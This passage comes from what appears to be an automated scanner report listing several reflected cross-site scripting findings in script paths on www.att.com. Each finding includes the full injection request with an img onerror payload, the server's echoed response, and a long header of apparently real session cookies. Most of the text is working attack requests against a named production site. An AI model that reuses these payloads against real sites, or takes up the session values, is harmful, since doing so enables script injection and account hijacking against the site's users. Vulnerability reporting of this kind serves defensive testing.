Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9095
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:42 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsa45d2"><img src=a onerror=alert(1)>3346b059c1b/cssBrowserSelector.js">
...[SNIP]...

1.28. https://www.att.com/olam/js/cssBrowserSelector.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/cssBrowserSelector.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 894df"><img%20src%3da%20onerror%3dalert(1)>d28d73dbbf4 was submitted in the REST URL parameter 3. This input was echoed as 894df"><img src=a onerror=alert(1)>d28d73dbbf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/cssBrowserSelector.js894df"><img%20src%3da%20onerror%3dalert(1)>d28d73dbbf4 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9095
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:50 GMT
Connection: keep-alive
Set-Cookie: TLTHID=5CE555EE0B8C100B730BDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/cssBrowserSelector.js894df"><img src=a onerror=alert(1)>d28d73dbbf4">
...[SNIP]...

1.29. https://www.att.com/olam/js/flash.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/flash.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 869f8"><img%20src%3da%20onerror%3dalert(1)>958f884d9fe was submitted in the REST URL parameter 2. This input was echoed as 869f8"><img src=a onerror=alert(1)>958f884d9fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js869f8"><img%20src%3da%20onerror%3dalert(1)>958f884d9fe/flash.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9082
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:24 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js869f8"><img src=a onerror=alert(1)>958f884d9fe/flash.js">
...[SNIP]...

1.30. https://www.att.com/olam/js/flash.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/flash.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b7fd"><img%20src%3da%20onerror%3dalert(1)>f64c2419706 was submitted in the REST URL parameter 3. This input was echoed as 7b7fd"><img src=a onerror=alert(1)>f64c2419706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/flash.js7b7fd"><img%20src%3da%20onerror%3dalert(1)>f64c2419706 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9082
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:25:32 GMT
Connection: keep-alive
Set-Cookie: TLTHID=99D964400B8C100B76B4DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/flash.js7b7fd"><img src=a onerror=alert(1)>f64c2419706">
...[SNIP]...

1.31. https://www.att.com/olam/js/gvpUtils.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/gvpUtils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6e24"><img%20src%3da%20onerror%3dalert(1)>fb65610e00a was submitted in the REST URL parameter 2. This input was echoed as b6e24"><img src=a onerror=alert(1)>fb65610e00a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsb6e24"><img%20src%3da%20onerror%3dalert(1)>fb65610e00a/gvpUtils.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9085
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:42 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsb6e24"><img src=a onerror=alert(1)>fb65610e00a/gvpUtils.js">
...[SNIP]...

1.32. https://www.att.com/olam/js/gvpUtils.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/gvpUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d36e"><img%20src%3da%20onerror%3dalert(1)>0c6c16a6721 was submitted in the REST URL parameter 3. This input was echoed as 3d36e"><img src=a onerror=alert(1)>0c6c16a6721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/gvpUtils.js3d36e"><img%20src%3da%20onerror%3dalert(1)>0c6c16a6721 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9085
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:50 GMT
Connection: keep-alive
Set-Cookie: TLTHID=5CE4AAD60B8C100B730ADD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/gvpUtils.js3d36e"><img src=a onerror=alert(1)>0c6c16a6721">
...[SNIP]...

1.33. https://www.att.com/olam/js/hideSelect.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/hideSelect.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c551"><img%20src%3da%20onerror%3dalert(1)>1ecfeef0472 was submitted in the REST URL parameter 2. This input was echoed as 6c551"><img src=a onerror=alert(1)>1ecfeef0472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js6c551"><img%20src%3da%20onerror%3dalert(1)>1ecfeef0472/hideSelect.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:24:09 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js6c551"><img src=a onerror=alert(1)>1ecfeef0472/hideSelect.js">
...[SNIP]...

